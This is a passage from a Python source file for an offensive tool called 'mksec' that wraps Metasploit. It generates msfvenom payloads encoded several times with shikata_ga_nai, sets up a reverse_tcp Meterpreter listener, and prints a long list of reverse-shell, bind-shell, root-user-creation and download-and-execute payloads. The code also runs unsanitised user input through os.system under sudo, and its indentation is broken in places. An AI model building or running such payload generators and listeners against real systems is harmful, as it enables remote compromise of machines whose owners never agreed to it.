Connect back to the attacker (Windows x64)\nwindows/x64/vncinject/reverse_tcp_rc4 Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker\nwindows/x64/vncinject/reverse_tcp_uuid Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)\nwindows/x64/vncinject/reverse_winhttp Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 winhttp)\nwindows/x64/vncinject/reverse_winhttps Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTPS (Windows x64 winhttp)\n""")
# NOTE(review): continuation of the command-dispatch chain begun above this
# chunk; `uinput`, `payload`, `host`, `port`, `format` and `output` are
# collected earlier in the enclosing loop.
# "run": assemble and execute an msfvenom payload-generation command using the
# msfvenom found on PATH, with a fixed encoder (x86/shikata_ga_nai, 6 passes).
elif "run" == uinput.lower():
# NOTE(review): the command is built by raw string concatenation of
# user-supplied values and run through os.system under sudo — this is
# shell-injectable; subprocess.run with a list argument would be safer.
# Also `format` shadows the builtin of the same name (presumably set as a
# plain variable earlier — confirm against the code above this chunk).
os.system("sudo msfvenom -p " + payload.strip() + " LHOST=" + host.strip() + " LPORT=" + port.strip() + " -e x86/shikata_ga_nai -i 6 -f " + format.strip() + " -o " + output.strip())
# "run -f" ("force"): same msfvenom invocation, but explicitly using the copy
# installed under /opt/metasploit-framework instead of whatever is on PATH.
elif "run -f" == uinput.lower():
os.system("cd /opt/metasploit-framework/ && sudo ./msfvenom -p " + payload.strip() + " LHOST=" + host.strip() + " LPORT=" + port.strip() + " -e x86/shikata_ga_nai -i 6 -f " + format.strip() + " -o " + output.strip())
def PayloadListener():
    """Interactive configuration prompt for a Metasploit payload listener.

    Mimics msfconsole's 'exploit/multi/handler' workflow: the user can view
    'info' / 'options' and issue 'set payload' / 'set lhost' / 'set lport'
    commands to update the settings shown in the options table.
    """
    # Current settings, pre-padded with spaces so they line up in the
    # column-formatted 'options' output below.
    payload = " windows/meterpreter/reverse_tcp "
    host = " <IP> "
    port = " 4444 "
    # Best-effort discovery of a local interface and its IPv4 address by
    # scraping `ip addr` output.
    # NOTE(review): assumes the interface of interest is the one numbered
    # "2:" and that it has an "inet " (IPv4) line — raises IndexError
    # otherwise. Fragile on hosts with multiple/renamed NICs; TODO confirm.
    youriface = os.popen('ip addr').read().split("2:")[1].split(":")[0]
    ipv4 = os.popen('ip addr show {}'.format(youriface)).read().split("inet ")[1].split("/")[0]
    while 1:
        # ANSI-colored prompt: "[mksec][listener] ".
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[listener]\033[37m\x1b[0m ")
        # Hand the raw input to the shared command dispatcher; the "exp"
        # suffix presumably tags which menu context this call comes from —
        # TODO confirm against UserInputs() (defined elsewhere in the file).
        UserInputs(uinput+"exp")
        if uinput.lower() == "info":
            # Bilingual (EN/TR) description of this listener tool.
            print("\x1b[1m\x1b[33mEN:\x1b[37mPayload is a listening tool. Edited by mksec using the 'exploit/multi/handler' module in the Metasploit tool. \x1b[36m'run'\x1b[37m command does not work, try with \x1b[36m'run -f'\x1b[37m (-f : --force). \n\x1b[33mTR:\x1b[37mPayload dinleme aracıdır. Metasploit aracı içerisindeki 'exploit/multi/handler' modülünü kullanarak mksec tarafından düzenlenmiştir. \x1b[36m'run'\x1b[37m komutu çalışmazsa \x1b[36m'run -f'\x1b[37m (-f : --force) ile deneyiniz.")
        elif uinput.lower() == "options":
            # msfconsole-style options table; interpolates the current
            # payload/host/port values plus the detected IPv4 address.
            print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nPAYLOAD{} YES Type '--list payloads' or '-lp' to see payloads \x1b[32mDefault: windows/meterpreter/reverse_tcp\x1b[37m\nLHOST {} YES Your IP address = \x1b[32m{}\x1b[37m\nLPORT {} YES Type in port \x1b[32mDefault = 4444\x1b[37m".format(payload,host,ipv4,port))
        elif "set payload" in uinput.lower():
            payload = uinput
            # Strip the "set payload " prefix in its common casings and
            # centre-pad to 50 chars for table alignment.
            # NOTE(review): mixed casings such as "Set Payload " are not
            # stripped, leaving the prefix embedded in the stored value.
            payload = payload.replace("set payload ","").replace("set PAYLOAD ","").replace("SET payload ","").replace("SET PAYLOAD ","").center(50)
        elif "set lhost" in uinput.lower():
            host = uinput
            # Same prefix-stripping scheme for LHOST.
            host = host.replace("set lhost ","").replace("set LHOST ","").replace("SET lhost ","").replace("SET LHOST ","").center(50)
        elif "set lport" in uinput.lower():
            port = uinput
            # Same prefix-stripping scheme for LPORT.
            port = port.replace("set lport ","").replace("set LPORT ","").replace("SET lport ","").replace("SET LPORT ","").center(50)
elif "--list payload" in uinput or "-lp" == uinput.lower():
print("""\x1b[1m\x1b[33mFramework Payloads (592 total)\x1b[37m\n\x1b[33m==================================================\x1b[37m\n\n\x1b[33mName\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m----\x1b[37m \x1b[33m-----------\x1b[37m\naix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell\naix/ppc/shell_find_port Spawn a shell on an established connection\naix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)\naix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell\nandroid/meterpreter/reverse_http Run a meterpreter server in Android. Tunnel communication over HTTP\nandroid/meterpreter/reverse_https Run a meterpreter server in Android. Tunnel communication over HTTPS\nandroid/meterpreter/reverse_tcp Run a meterpreter server in Android. Connect back stager\nandroid/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell\nandroid/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell\nandroid/meterpreter_reverse_tcp Connect back to the attacker and spawn a Meterpreter shell\nandroid/shell/reverse_http Spawn a piped command shell (sh). Tunnel communication over HTTP\nandroid/shell/reverse_https Spawn a piped command shell (sh). Tunnel communication over HTTPS\nandroid/shell/reverse_tcp Spawn a piped command shell (sh). 
Connect back stager\napple_ios/aarch64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\napple_ios/aarch64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\napple_ios/aarch64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\napple_ios/aarch64/shell_reverse_tcp Connect back to attacker and spawn a command shell\napple_ios/armle/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\napple_ios/armle/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\napple_ios/armle/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nbsd/sparc/shell_bind_tcp Listen for a connection and spawn a command shell\nbsd/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell\nbsd/vax/shell_reverse_tcp Connect back to attacker and spawn a command shell\nbsd/x64/exec Execute an arbitrary command\nbsd/x64/shell_bind_ipv6_tcp Listen for a connection and spawn a command shell over IPv6\nbsd/x64/shell_bind_tcp Bind an arbitrary command to an arbitrary port\nbsd/x64/shell_bind_tcp_small Listen for a connection and spawn a command shell\nbsd/x64/shell_reverse_ipv6_tcp Connect back to attacker and spawn a command shell over IPv6\nbsd/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell\nbsd/x64/shell_reverse_tcp_small Connect back to attacker and spawn a command shell\nbsd/x86/exec Execute an arbitrary command\nbsd/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service\nbsd/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service\nbsd/x86/shell/bind_ipv6_tcp Spawn a command shell (staged). Listen for a connection over IPv6\nbsd/x86/shell/bind_tcp Spawn a command shell (staged). Listen for a connection\nbsd/x86/shell/find_tag Spawn a command shell (staged). 
Use an established connection\nbsd/x86/shell/reverse_ipv6_tcp Spawn a command shell (staged). Connect back to the attacker over IPv6\nbsd/x86/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nbsd/x86/shell_bind_tcp Listen for a connection and spawn a command shell\nbsd/x86/shell_bind_tcp_ipv6 Listen for a connection and spawn a command shell over IPv6\nbsd/x86/shell_find_port Spawn a shell on an established connection\nbsd/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)\nbsd/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell\nbsd/x86/shell_reverse_tcp_ipv6 Connect back to attacker and spawn a command shell over IPv6\nbsdi/x86/shell/bind_tcp Spawn a command shell (staged). Listen for a connection\nbsdi/x86/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nbsdi/x86/shell_bind_tcp Listen for a connection and spawn a command shell\nbsdi/x86/shell_find_port Spawn a shell on an established connection\nbsdi/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell\ncmd/mainframe/apf_privesc_jcl (Elevate privileges for user. Adds SYSTEM SPECIAL and BPX.SUPERUSER to user profile. Does this by using an unsecured/updateable APF authorized library (APFLIB) and updating the user's ACEE using this program/library. Note: This privesc only works with z/OS systems using RACF, no other ESM is supported.)\ncmd/mainframe/bind_shell_jcl Provide JCL which creates a bind shell This implmentation does not include ebcdic character translation, so a client with translation capabilities is required. MSF handles this automatically.\ncmd/mainframe/generic_jcl Provide JCL which can be used to submit a job to JES2 on z/OS which will exit and return 0. 
This can be used as a template for other JCL based payloads\ncmd/mainframe/reverse_shell_jcl Provide JCL which creates a reverse shell This implementation does not include ebcdic character translation, so a client with translation capabilities is required. MSF handles this automatically.\ncmd/unix/bind_awk Listen for a connection and spawn a command shell via GNU AWKcmd/unix/bind_busybox_telnetd Listen for a connection and spawn a command shell via BusyBox telnetdcmd/unix/bind_inetd Listen for a connection and spawn a command shell (persistent)cmd/unix/bind_jjs Listen for a connection and spawn a command shell via jjs\ncmd/unix/bind_lua Listen for a connection and spawn a command shell via Lua\ncmd/unix/bind_netcat Listen for a connection and spawn a command shell via netcat\ncmd/unix/bind_netcat_gaping Listen for a connection and spawn a command shell via netcat\ncmd/unix/bind_netcat_gaping_ipv6 Listen for a connection and spawn a command shell via netcat\ncmd/unix/bind_nodejs Continually listen for a connection and spawn a command shell via nodejs\ncmd/unix/bind_perl Listen for a connection and spawn a command shell via perl\ncmd/unix/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl\ncmd/unix/bind_r Continually listen for a connection and spawn a command shell via R\ncmd/unix/bind_ruby Continually listen for a connection and spawn a command shell via Ruby\ncmd/unix/bind_ruby_ipv6 Continually listen for a connection and spawn a command shell via Ruby\ncmd/unix/bind_socat_udp Creates an interactive shell via socat\ncmd/unix/bind_stub Listen for a connection and spawn a command shell (stub only, no payload)\ncmd/unix/bind_zsh Listen for a connection and spawn a command shell via Zsh. 
Note: Although Zsh is often available, please be aware it isn't usually installed by default.\ncmd/unix/generic Executes the supplied command\ncmd/unix/interact Interacts with a shell on an established socket connection\ncmd/unix/pingback_bind Accept a connection, send a UUID, then exit\ncmd/unix/pingback_reverse Creates a socket, send a UUID, then exit\ncmd/unix/reverse Creates an interactive shell through two inbound connections\ncmd/unix/reverse_awk Creates an interactive shell via GNU AWK\ncmd/unix/reverse_bash Creates an interactive shell via bash's builtin /dev/tcp. This will not work on circa 2009 and older Debian-based Linux distributions (including Ubuntu) because they compile bashwithout the /dev/tcp feature.\ncmd/unix/reverse_bash_telnet_ssl Creates an interactive shell via mkfifo and telnet. This method works on Debian and other systems compiled without /dev/tcp support. This module uses the '-z' option included on some systems to encrypt using SSL.\ncmd/unix/reverse_bash_udp Creates an interactive shell via bash's builtin /dev/udp. This will not work on circa 2009 and older Debian-based Linux distributions (including Ubuntu) because they compile bashwithout the /dev/udp feature.\ncmd/unix/reverse_jjs Connect back and create a command shell via jjs\ncmd/unix/reverse_ksh Connect back and create a command shell via Ksh. 
Note: Although Ksh is often available, please be aware it isn't usually installed by default.\ncmd/unix/reverse_lua Creates an interactive shell via Lua\ncmd/unix/reverse_ncat_ssl Creates an interactive shell via ncat, utilizing ssl mode\ncmd/unix/reverse_netcat Creates an interactive shell via netcat\ncmd/unix/reverse_netcat_gaping Creates an interactive shell via netcat\ncmd/unix/reverse_nodejs Continually listen for a connection and spawn a command shell via nodejs\ncmd/unix/reverse_openssl Creates an interactive shell through two inbound connections\ncmd/unix/reverse_perl Creates an interactive shell via perl\ncmd/unix/reverse_perl_ssl Creates an interactive shell via perl, uses SSL\ncmd/unix/reverse_php_ssl Creates an interactive shell via php, uses SSL\ncmd/unix/reverse_python Connect back and create a command shell via Python\ncmd/unix/reverse_python_ssl Creates an interactive shell via python, uses SSL, encodes with base64 by design.\ncmd/unix/reverse_r Connect back and create a command shell via R\ncmd/unix/reverse_ruby Connect back and create a command shell via Ruby\ncmd/unix/reverse_ruby_ssl Connect back and create a command shell via Ruby, uses SSL\ncmd/unix/reverse_socat_udp Creates an interactive shell via socat\ncmd/unix/reverse_ssh Connect back and create a command shell via SSH\ncmd/unix/reverse_ssl_double_telnet Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option\ncmd/unix/reverse_stub Creates an interactive shell through an inbound connection (stub only, no payload)\ncmd/unix/reverse_tclsh Creates an interactive shell via Tclsh\ncmd/unix/reverse_zsh Connect back and create a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn't usually installed by default.\ncmd/windows/adduser Create a new user and add them to local administration group. 
Note: The specified password is checked for common complexity requirements to prevent the target machine rejecting the user for failing to meet policy requirements. Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)\ncmd/windows/bind_lua Listen for a connection and spawn a command shell via Lua\ncmd/windows/bind_perl Listen for a connection and spawn a command shell via perl (persistent)\ncmd/windows/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl (persistent)\ncmd/windows/bind_ruby Continually listen for a connection and spawn a command shell via Ruby\ncmd/windows/download_eval_vbs Downloads a file from an HTTP(S) URL and executes it as a vbs script. Use it to stage a vbs encoded payload from a short command line.\ncmd/windows/download_exec_vbs Download an EXE from an HTTP(S) URL and execute it\ncmd/windows/generic Executes the supplied command\ncmd/windows/powershell_bind_tcp Interacts with a powershell session on an established socket connection\ncmd/windows/powershell_reverse_tcp Interacts with a powershell session on an established socket connection\ncmd/windows/reverse_lua Creates an interactive shell via Lua\ncmd/windows/reverse_perl Creates an interactive shell via perl\ncmd/windows/reverse_powershell Connect back and create a command shell via Powershell\ncmd/windows/reverse_ruby Connect back and create a command shell via Ruby\nfirefox/exec This module runs a shell command on the target OS without touching the disk. On Windows, this command will flash the command prompt momentarily. This can be avoided by setting WSCRIPT to true, which drops a jscript "launcher" to disk that hides the prompt.\nfirefox/shell_bind_tcp Creates an interactive shell via Javascript with access to Firefox's XPCOM API\nfirefox/shell_reverse_tcp Creates an interactive shell via Javascript with access to Firefox's XPCOM API\ngeneric/custom Use custom string or file as payload. 
Set either PAYLOADFILE or PAYLOADSTR.\ngeneric/debug_trap Generate a debug trap in the target process\ngeneric/shell_bind_tcp Listen for a connection and spawn a command shell\ngeneric/shell_reverse_tcp Connect back to attacker and spawn a command shell\ngeneric/tight_loop Generate a tight loop in the target process\njava/jsp_shell_bind_tcp Listen for a connection and spawn a command shell\njava/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell\njava/meterpreter/bind_tcp Run a meterpreter server in Java. Listen for a connection\njava/meterpreter/reverse_http Run a meterpreter server in Java. Tunnel communication over HTTP\njava/meterpreter/reverse_https Run a meterpreter server in Java. Tunnel communication over HTTPS\njava/meterpreter/reverse_tcp Run a meterpreter server in Java. Connect back stager\njava/shell/bind_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Listen for a connection\njava/shell/reverse_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager\njava/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/aarch64/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker\nlinux/aarch64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/aarch64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/aarch64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/aarch64/shell/reverse_tcp dup2 socket in x12, then execve. 
Connect back to the attacker\nlinux/aarch64/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/armbe/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/armbe/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/armbe/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/armbe/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/armle/adduser Create a new user with UID 0\nlinux/armle/exec Execute an arbitrary command\nlinux/armle/meterpreter/bind_tcp Inject the mettle server payload (staged). Listen for a connection\nlinux/armle/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker\nlinux/armle/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/armle/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/armle/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/armle/shell/bind_tcp dup2 socket in r12, then execve. Listen for a connection\nlinux/armle/shell/reverse_tcp dup2 socket in r12, then execve. Connect back to the attacker\nlinux/armle/shell_bind_tcp Connect to target and spawn a command shell\nlinux/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/mips64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/mips64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/mips64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsbe/exec A very small shellcode for executing commands. This module is sometimes helpful for testing purposes.\nlinux/mipsbe/meterpreter/reverse_tcp Inject the mettle server payload (staged). 
Connect back to the attacker\nlinux/mipsbe/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsbe/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsbe/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsbe/reboot A very small shellcode for rebooting the system. This payload is sometimes helpful for testing purposes or executing other payloads that rely on initial startup procedures.\nlinux/mipsbe/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nlinux/mipsbe/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/mipsbe/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/mipsle/exec A very small shellcode for executing commands. This module is sometimes helpful for testing purposes as well as on targets with extremely limited buffer space.\nlinux/mipsle/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker\nlinux/mipsle/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsle/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsle/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsle/reboot A very small shellcode for rebooting the system. This payload is sometimes helpful for testing purposes.\nlinux/mipsle/shell/reverse_tcp Spawn a command shell (staged). 
Connect back to the attacker\nlinux/mipsle/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/mipsle/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/ppc/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppc/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppc/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppc/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/ppc/shell_find_port Spawn a shell on an established connection\nlinux/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/ppc64/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/ppc64/shell_find_port Spawn a shell on an established connection\nlinux/ppc64/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/ppc64le/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppc64le/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppc64le/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppce500v2/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppce500v2/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppce500v2/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/x64/exec Execute an arbitrary command or just a /bin/sh shell\nlinux/x64/meterpreter/bind_tcp Inject the mettle server payload (staged). Listen for a connection\nlinux/x64/meterpreter/reverse_tcp Inject the mettle server payload (staged). 
Connect back to the attacker\nlinux/x64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/x64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/x64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/x64/pingback_bind_tcp Accept a connection from attacker and report UUID (Linux x64)\nlinux/x64/pingback_reverse_tcp Connect back to attacker and report UUID (Linux x64)\nlinux/x64/shell/bind_tcp Spawn a command shell (staged). Listen for a connection\nlinux/x64/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nlinux/x64/shell_bind_ipv6_tcp Listen for an IPv6 connection and spawn a command shell\nlinux/x64/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/x64/shell_bind_tcp_random_port Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'.\nlinux/x64/shell_find_port Spawn a shell on an established connection\nlinux/x64/shell_reverse_ipv6_tcp Connect back to attacker and spawn a command shell over IPv6\nlinux/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/x86/adduser Create a new user with UID 0\nlinux/x86/chmod Runs chmod on specified file with specified mode\nlinux/x86/exec Execute an arbitrary command or just a /bin/sh shell\nlinux/x86/meterpreter/bind_ipv6_tcp Inject the mettle server payload (staged). Listen for an IPv6 connection (Linux x86)\nlinux/x86/meterpreter/bind_ipv6_tcp_uuid Inject the mettle server payload (staged). Listen for an IPv6 connection with UUID Support (Linux x86)\nlinux/x86/meterpreter/bind_nonx_tcp Inject the mettle server payload (staged). Listen for a connection\nlinux/x86/meterpreter/bind_tcp Inject the mettle server payload (staged). Listen for a connection (Linux x86)\nlinux/x86/meterpreter/bind_tcp_uuid Inject the mettle server payload (staged). 
Listen for a connection with UUID Support (Linux x86)\nlinux/x86/meterpreter/find_tag Inject the mettle server payload (staged). Use an established connection\nlinux/x86/meterpreter/reverse_ipv6_tcp Inject the mettle server payload (staged). Connect back to attacker over IPv6\nlinux/x86/meterpreter/reverse_nonx_tcp Inject the mettle server payload (staged). Connect back to the attacker\nlinux/x86/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker\nlinux/x86/meterpreter/reverse_tcp_uuid Inject the mettle server payload (staged). Connect back to the attacker\nlinux/x86/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/x86/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/x86/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service\nlinux/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service\nlinux/x86/read_file Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor\nlinux/x86/shell/bind_ipv6_tcp Spawn a command shell (staged). Listen for an IPv6 connection (Linux x86)\nlinux/x86/shell/bind_ipv6_tcp_uuid Spawn a command shell (staged). Listen for an IPv6 connection with UUID Support (Linux x86)\nlinux/x86/shell/bind_nonx_tcp Spawn a command shell (staged). Listen for a connection\nlinux/x86/shell/bind_tcp Spawn a command shell (staged). Listen for a connection (Linux x86)\nlinux/x86/shell/bind_tcp_uuid Spawn a command shell (staged). Listen for a connection with UUID Support (Linux x86)\nlinux/x86/shell/find_tag Spawn a command shell (staged). Use an established connection\nlinux/x86/shell/reverse_ipv6_tcp Spawn a command shell (staged). Connect back to attacker over IPv6\nlinux/x86/shell/reverse_nonx_tcp Spawn a command shell (staged). 
Connect back to the attacker\nlinux/x86/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nlinux/x86/shell/reverse_tcp_uuid Spawn a command shell (staged). Connect back to the attacker\nlinux/x86/shell_bind_ipv6_tcp Listen for a connection over IPv6 and spawn a command shell\nlinux/x86/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/x86/shell_bind_tcp_random_port Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'.\nlinux/x86/shell_find_port Spawn a shell on an established connection\nlinux/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)\nlinux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/x86/shell_reverse_tcp_ipv6 Connect back to attacker and spawn a command shell over IPv6\nlinux/zarch/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/zarch/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/zarch/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nmainframe/shell_reverse_tcp Listen for a connection and spawn a command shell. This implementation does not include ebcdic character translation, so a client with translation capabilities is required. MSF handles this automatically.\nmulti/meterpreter/reverse_http Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTP\nmulti/meterpreter/reverse_https Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTPS\nnetware/shell/reverse_tcp Connect to the NetWare console (staged). 
Connect back to the attacker\nnodejs/shell_bind_tcp Creates an interactive shell via nodejs\nnodejs/shell_reverse_tcp Creates an interactive shell via nodejs\nnodejs/shell_reverse_tcp_ssl Creates an interactive shell via nodejs, uses SSL\nosx/armle/execute/bind_tcp Spawn a command shell (staged). Listen for a connection\nosx/armle/execute/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nosx/armle/shell/bind_tcp Spawn a command shell (staged). Listen for a connection\nosx/armle/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nosx/armle/shell_bind_tcp Listen for a connection and spawn a command shell\nosx/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell\nosx/armle/vibrate Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded. Based on work by Charlie Miller <cmiller[at]securityevaluators.com>.\nosx/ppc/shell/bind_tcp Spawn a command shell (staged). Listen for a connection\nosx/ppc/shell/find_tag Spawn a command shell (staged). Use an established connection\nosx/ppc/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nosx/ppc/shell_bind_tcp Listen for a connection and spawn a command shell\nosx/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell\nosx/x64/dupandexecve/bind_tcp dup2 socket in edi, then execve. Listen, read length, read buffer, execute\nosx/x64/dupandexecve/reverse_tcp dup2 socket in edi, then execve. Connect, read length, read buffer, execute\nosx/x64/dupandexecve/reverse_tcp_uuid dup2 socket in edi, then execve. Connect back to the attacker with UUID Support (OSX x64)\nosx/x64/exec Execute an arbitrary command\nosx/x64/meterpreter/bind_tcp Inject the mettle server payload (staged). Listen, read length, read buffer, execute\nosx/x64/meterpreter/reverse_tcp Inject the mettle server payload (staged). 
Connect, read length, read buffer, execute\nosx/x64/meterpreter/reverse_tcp_uuid Inject the mettle server payload (staged). Connect back to the attacker with UUID Support (OSX x64)\nosx/x64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nosx/x64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nosx/x64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nosx/x64/say Say an arbitrary string outloud using Mac OS X text2speech\nosx/x64/shell_bind_tcp Bind an arbitrary command to an arbitrary port\nosx/x64/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)\nosx/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell\nosx/x86/bundleinject/bind_tcp Inject a custom Mach-O bundle into the exploited process. Listen, read length, read buffer, execute\nosx/x86/bundleinject/reverse_tcp Inject a custom Mach-O bundle into the exploited process. Connect, read length, read buffer, execute\nosx/x86/exec Execute an arbitrary command\nosx/x86/isight/bind_tcp Inject a Mach-O bundle to capture a photo from the iSight (staged). Listen, read length, read buffer, execute\nosx/x86/isight/reverse_tcp Inject a Mach-O bundle to capture a photo from the iSight (staged). Connect, read length, read buffer, execute\nosx/x86/shell_bind_tcp Listen for a connection and spawn a command shell\nosx/x86/shell_find_port Spawn a shell on an established connection\nosx/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell\nosx/x86/vforkshell/bind_tcp Call vfork() if necessary and spawn a command shell (staged). Listen, read length, read buffer, execute\nosx/x86/vforkshell/reverse_tcp Call vfork() if necessary and spawn a command shell (staged). 
